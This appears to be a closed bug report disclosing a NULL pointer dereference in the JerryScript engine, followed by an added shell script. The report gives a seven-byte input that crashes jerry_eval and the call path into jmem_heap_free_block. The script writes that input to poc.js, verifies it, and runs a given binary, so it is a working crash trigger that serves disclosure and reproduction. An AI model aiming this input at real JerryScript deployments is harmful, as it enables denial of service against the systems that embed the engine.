Closed
Description
I've discovered a NULL pointer dereference condition within Jerryscript.
If the bytes "0x27 0x5c 0xe2 0x80 0xa8 0x27 0x41" are evaluated by jerry_eval, a segmentation fault will occur, resulting in a denial of service.
It occurs within jmem_heap_free_block when block_p->size is dereferenced.
The call tree is as follows (generally):
- jerry_eval
- ecma_op_eval_chars_buffer
- parser_parse_script
- parser_parse_source
- lexer_next_token (parses the source for strings and returns)
- parser_parse_statements (throws a parsing error via parser_raise_error and returns to the parser_parse_source PARSER_CATCH statement)
- parser_free_literals
- util_free_literal
- jmem_heap_free_block (SEGMENTATION FAULT)

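The following helper is an added reproducer script, not part of the original report or of the JerryScript project. Decoded, the seven bytes above are a single quote, a backslash, U+2028 LINE SEPARATOR (E2 80 A8 in UTF-8), a second single quote and the letter A; the script writes exactly those bytes to a file, verifies the file byte-for-byte with `od`, and then, if given the path to a JerryScript command-line binary, runs that binary against the file and reports its exit status. The binary path, the assumption that the CLI accepts a script file as its argument, and the file name `poc.js` are assumptions for illustration.

```sh
#!/bin/sh
# Added reproducer helper for the report above; not the project's own code.
# Usage: sh repro.sh /path/to/jerry   (the binary path is an assumption)

# Write the seven bytes from the report to the file named by $1.
# Octal escapes: \047 = 0x27 ('), \134 = 0x5c (\), \342\200\250 = U+2028.
write_poc() {
  printf '\047\134\342\200\250\047A' > "$1"
}

# Print the file's contents as space-separated lowercase hex bytes, so the
# generated input can be checked against the bytes quoted in the report.
poc_hex() {
  od -An -v -tx1 "$1" | tr -s ' \n' ' ' | sed 's/^ //; s/ $//'
}

# Byte count of the file; the report's input is exactly 7 bytes.
poc_size() {
  wc -c < "$1" | tr -d ' '
}

# Run the engine on the file and return its exit status. A shell reports a
# child killed by SIGSEGV as 128 + 11 = 139, which is what the reported
# crash would look like from the outside.
run_poc() {
  jerry_bin=$1
  script=$2
  if [ ! -x "$jerry_bin" ]; then
    echo "not an executable: $jerry_bin" >&2
    return 2
  fi
  "$jerry_bin" "$script"
  status=$?
  echo "exit status: $status (139 = SIGSEGV)"
  return "$status"
}

# Only runs when a binary path is supplied on the command line.
if [ $# -ge 1 ]; then
  write_poc poc.js
  echo "poc.js bytes: $(poc_hex poc.js) ($(poc_size poc.js) bytes)"
  run_poc "$1" poc.js
fi
```

Writing the bytes with `printf` octal escapes rather than pasting the characters avoids the editor or terminal silently normalising U+2028, which is the whole trigger here; check the `od` output before trusting any run.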